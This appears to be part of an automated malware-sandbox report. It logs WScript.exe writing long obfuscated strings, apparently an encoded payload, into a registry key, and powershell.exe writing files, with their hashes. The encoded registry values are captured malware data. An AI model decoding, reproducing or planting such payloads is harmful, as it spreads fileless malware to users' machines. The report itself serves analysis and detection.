viuvviivviivviivviivvtivvtpvvtyvvtqtrvvtqtyvvtqtqtqtuvvtqiuvvtpvvttvvtwvviivvtsvviivviivviivviivvtuvvttvvtuvvttvvtpvviyvvtpvvtuvviuvvitvviivviuvviivviivviivviivvtuvvtivvtuvvtqiuvvtpvvitvvttvviivvtpvviivviivviivviivvtpvvirvvtovviyvvtqtpvvtpvvirvvtovvtovvtqtpvvtqttvviivvttvvtpvvirvvtyvvtivvtqtyvvtpvvirvvtqiuvvtpvvtsvvtyvvtuvvtqtpvvtpvvirvvtyvvtivvtqtpvvtuvvtwvvtpvvtsvvtyvviyvviivvitvvtpvvtsvvtyvvtuvviivvtyvviuvvtpvviwvvtyvviivvtsvviivviivviivviivviivviivvtovvtuvviivvitvvtpvviyvvtyvviuvvtqitvvtpvvirvviivvtqtuvvtwvvtuvvtivviuvvtpvviwvvitvviivvtsvviivviivviivviivvtuvvttvviuvvtpvvtovvtpvviivvtsvviivviivviivviivviivviivvtovvtuvvtqtpvviuvvtpvvtpvvtovviivvtsvviivviivviivviivviivviivvtovvtuvvtqtpvvtpvvirvviyvvtpvvtuvvttvvtuvvtivviuvvtpvviivvtovviivvtsvviivviivviivviivvtpvvirvvtyvviyvvtqtpvvtpvvttvvitvvtyvvtyvvtqtuvvtivvttvvirvvitvvtwvvtovvtuvvtwvvtsvvtpvvtsvvtuvviivvtwvvtyvvtpvvtsvvtyvviivvtwvvtpvviuvvtpvvtyvviuvviivvtsvviivviivviivviivvtpvvirvvtyvvtuvviivvitvvtpvvttvvitvvtqtqitvvtqttvvtyvvtuvviivvtyvvtqtwvvtyvvtovvtqtpvviuvvirvvtwvvtqiuvvtpvvttvvirvviivvtsvviivviivviivviivvtuvvttvviuvvtpvvttvvtuvviivvtsvviivviivviivviivvtpvvttvvtivvtovvtqtpvvtqtqtuvvtsvvtuvvtsvvtuvviivvtuvviuvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtuvvtovvtivviwvvtqttvvtuvviivvtpvvirvvtyvvtivvtqtyvvtpvvttvviuvvtpvvtqtqtovvtyvvtyvviuvvtpvvttvviuvvtpvvtqtwvvtovvtyvvtyvvtwvvtyvvtpvvtpvvttvviuvvtpvvtqtwvvtovvtyvvttvvttvvtpvvttvviuvvtpvvtqtwvvtovvtyvvtrvvtivvtrvvirvvitvvtovvtovvtyvvtwvviwvvtpvvttvviuvvtpvvtqtyvvtovvtyvvtqiyvvtpvvttvviuvvtpvvtqtwvvtovvtuvvttvvirvvtuvvtivviuvvtpvvtqtrvvtqtuvvtqtqtqtqiuvvirvvttvvtrvvtuvvtivviuvvtpvvtuvvtsvvtqtqtqtqtqtqiuvvirvvtrvviwvvtuvvtivviuvvtpvvtwvvtpvvtqrtvvtqiuvvirvvtrvvtrvvtuvvtivviuvvtpvvitvvirvvtqtrvvtqtqtqtqiuvvirvvtwvviwvvtuvvtivviuvvtpvvtsvvtwvvtqtuvvtqtqtqtqiuvvirvvtwvvtrvvtuvvtivviuvvtpvvirvvtqtqrtvvtqiuvvirvvtqiwvvtpvvtqttvviuvvtqtqtovvtuvvtqtivvtivviwvvtqtqiivviivvtuvvtivvtwvvitvvtuvvtsvvii | |||
(PID) Process: | (2220) WScript.exe | Key: | HKEY_CURRENT_USER\Software\admin |
Operation: | write | Name: | 8 |
Value: vviivvtyvviuvvtqtyvvtpvvttvvtovviuvvtqtyvviivviivvtovvtuvvtqiivvttvvtrvvitvvtqiuvvirvvtwvvirvvtuvvtivviuvvtpvvtpvvtwvviivviivviivviivviivviivvtuvvtsvvtpvvtyvvitvvtqtovvtyvviivvtwvviuvvtpvviwvviyvviivvitvviivviivviivviivvttvvttvviyvvtrvviivvtovviivvtovvtpvvttvviivviwvvtqtwvvtovvtyvviuvvtovvirvvtqtqtwvvtuvviivvtuvviuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtuvvtwvvtuvvtivvtpvvirvvtovvtuvvtqtpvvtpvvtqttvviuvvtqtqtqiivvtpvvtuvvirvvtqtqtqtqtqtqtqtuvvtivvitvvtovvtyvvtivvtqtpvvttvvtivvtqtqtqtqtqtqiuvvtpvvtivvtqiivviuvviivviivviivviivvtpvvttvvtovviuvvtwvvtyvvtqtqtuvvtsvvtqiivvtpvvtyvvtsvvtuvvtqtqtqtqtqtqtuvvttvvtuvvtovvtpvviyvvtyvvtuvviivvtpvvtuvvtqtpvviyvvtyvvtuvvtqtpvvtuvvtqtpvviyvvtyvvtuvviivvitvvtuvvtqiivviivvtovvtivvtwvvtyvviuvvtpvviyvvtovvtqttvvtqtqtqtqtpvvirvvtovviyvvtqtpvvtpvvttvvitvvtyvvtwvvtqtpvvirvvtuvviivvttvvtpvvtivviwvvtyvvtqtivvtpvvtqtqttvvtqtqtqtqtqtuvvttvviivviivvtovvtovvtwvvitvviivviivvtwvvtuvvtyvvtpvvttvviuvvtyvvtuvvtqtqtpvvirvvitvvtpvvtpvvtuvvitvvtsvvtovvtuvvtwvvtwvvtivviwvvtyvvtqtivvtpvvtqtqttvvtqtqtqtqtqtuvvttvvtuvvtqiivviivvtwvvtuvvtyvvtpvvttvviuvvtyvvtuvvtqtqtpvvirvvitvvtpvvtpvvtsvvtyvviuvvtqitvvtpvvtuvvitvvtsvvtovvtyvvttvvttvvtpvvirvvtyvvtuvviivvitvvtqiivvirvvtovvtyvvtqtwvvtqtrvvirvvtyvvtivvtwvvtyvvtqttvvitvvtovvttvvirvvtyvvtivvtwvvtpvvtovvtuvvtwvvttvvtuvvtqiivviivvtovvtivvtwvvtyvvtuvvtwvviuvvtpvvtrvvirvviivvtpvviivviivviivviivvtpvvttvvitvvtyvvtqitvvtpvvttvvtivvtivvrtvviuvvirvvtwvvtrvviivviivvtovvtovvttvvtpvvtuvvtwvviuvvtpvvtyvvtrvvtqtivvtqtqtqtqtpvvttvvtivvtivvtqitvvtqtqtuvvtsvvtuvvtsvvitvvtivvtqtivvtqtwvviivviivvtovvtivvtwvvtyvviuvvtpvviyvviwvviivvtovviivviivviivviivvtpvvttvvtivvtivvtwvvtyvvtqtqtuvvtsvvtuvviivvtuvvirvviuvvirvvtqttvvitvvtivvtqtivvtqtwvvtuvviuvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtuvvtwvvtuvvtwvvtuvvttvvtpvvirvvtuvviyvvtqtpvvtpvvtqttvvirvvtqtqtqiivvtpvvtuvvtsvvtsvvtqtqtqtqtqtqtuvvttvviuvvtpvviwvvtqiivviyvviivviivviivviivvtuvvtsvvtpvvirvvtyvvirvvtwvvtyvvtpvvtuvvitvvtsvvtovvtyvvtovvtpvvtpvvirvvtyvvtwvvtwvvtqtpvvttvvitvvtqtrvvtpvvttvvirvvtyvvttvvtwvvtpvvtovvtuvvtivvtivvtuvvtivvtuvvtovvtpvviyvvtyvvtuvvtqtpvvtuvvtqtpvviyvvtyvvtuvviivvtpvvtuvvtqtpvviyvvtyvvtuvviivvitvvtuvvtqiivviivvtovvttvvtqitvviuvvtpvvtqiivvtqttvvtqtqtqtqtivvirvvtyvvttvvtwvvtqtrvvtpvvtpvvttvvitvvtyvvtwvvtqtpvvirvvtovvttvvtwvvtyvvtivviwvvtqiwvvtqttvvtyvvtuvvtqtpvvtuvvtsvvtpvvirvviivvtpvviivvttvviwvvtuvvtpvvirvvtyvvtpvvtqitvvtuvviivvtuvviuvvtpvvtuvvitvvtsvvtovvtyvvtwvviuvvtpvvttvvtovvtpvvrtvvtovvtyvvtwvvtpvviivviivvtovvtqtwvvtqtpvvirvvtyvvttvvtwvvtyvvtpvvttvvitvvtqtrvvtpvvtuvvtqtpvvirvvtyvvttvvtqitvvtqttvvitvvtwvvtuvvtqiuvvtpvvtovviuvviivvtovviivviivviivviivvtpvvttvvitvvtyvvtqitvvtpvvirvvtyvvtuvviivvitvviivviivvtyvvttvvtwvvtqtqiivvirvvtovvtyvvtqtqtrvvttvvtsvvtyvvttvvtwvvtqtovviyvvtrvvtqtpvvttvvtyvvttvvtqtyvvtqtrvviuvvirvvtwvviwvvtuvvtwvviuvvtpvvttvvtrvviivvtovviivviivviivviivvtuvvtsvvtivviwvvtqtqiivviivvtovvttvvtqitvviuvvtpvvtovviuvvtqtuvvtqtqtqtqtpvvttvvtivvttvvtqitvvtqtqtuvvtsvvtuvvtsvvitvvtivvtqttvvtqtwvvtuvvirvvtpvvirvviuvvtuvvtuvviyvvitvvttvvtuvvtuvvtpvvirvviuvvitvvtpvvttvviuvvitvvtqitvvtuvvtovvtpvvirvvtovviyvvtqtpvvtpvvtqttvviivvtqtqtqiivvtpvvtuvvtsvviyvvtqtqtqtqtqtqtuvvttvvtuvvtivvtpvviyvvtyvvtuvvtqtpvvtuvvtqtpvviyvvtyvvtuvviivvtpvvtuvvtqtpvviyvvtyvvtuvviivvitvvtuvvtqiivviivvtovvtovvtqitvviuvvtpvvtovvtovvtqtrvvtqtqtqtqtivviwvvtqtwvviuvvtpvvtivvtpvviivvitvviivviivviivviivvtpvvirvviivvtqtuvvtivviivviivvtovvtuvvtqtpvviivviivvtovvtuvviivvitvviuvvtpvvtsvvtsvvtqtrvvtqtqtqtqtpvvirvviyvvtpvvtuvvtivvtpvvtsvvtuvviyvviivvtyvviuvvtpvvtyvviwvviivvitvviivviivviivviivvtpvvttvvitvvtyvvtrvvtyvvtpvvtuvviyvvirvvtovvtyvvtyvvirvvtpvvirvvtuvvtuvviivvtyvvtpvvirvvtyvvirvvtqitvvttvvttvviyvvirvvtqttvvtyvviivvtqitvvtpvvirvvitvvttvvtpvvirvvtovvtrvvtwvvtqtpvvtuvviivvtivvtovvtyvvttvvtovvtpvviyvvtwvvtyvvtqtpvvtpvvtsvvtuvvtuvviivvtyvvttvvtpvvtwvviwvvtovvtuvvtrvvtpvvtpvvtwvvtovvitvvtqtpvvtqtpvvtqtqtqtqtivvtqttvvtrvvtovvtuvvtwvviuvvtpvvtwvvtovvitvvtqtpvvtqitvvtqtqtqtqiivvtpvvtovvtivvtovvtuvvtwvvtyvvtpvvtwvvtovvitvvtqtpvvtwvvtqiwvv |
PID | Process | Filename | Type | |
---|---|---|---|---|
3544 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W2PAOVULZYZD7KFTQWZA.temp | — | |
MD5:— | SHA256:— | |||
3544 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1543b9.TMP | binary | |
MD5:6A4DD2AFE3AE71901499207B2E679221 | SHA256:70FF1DC4A9544B62383FA8EB536826ECD74E8C8ED1658FED310C3A16CE01A451 | |||
3544 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6A4DD2AFE3AE71901499207B2E679221 | SHA256:70FF1DC4A9544B62383FA8EB536826ECD74E8C8ED1658FED310C3A16CE01A451 |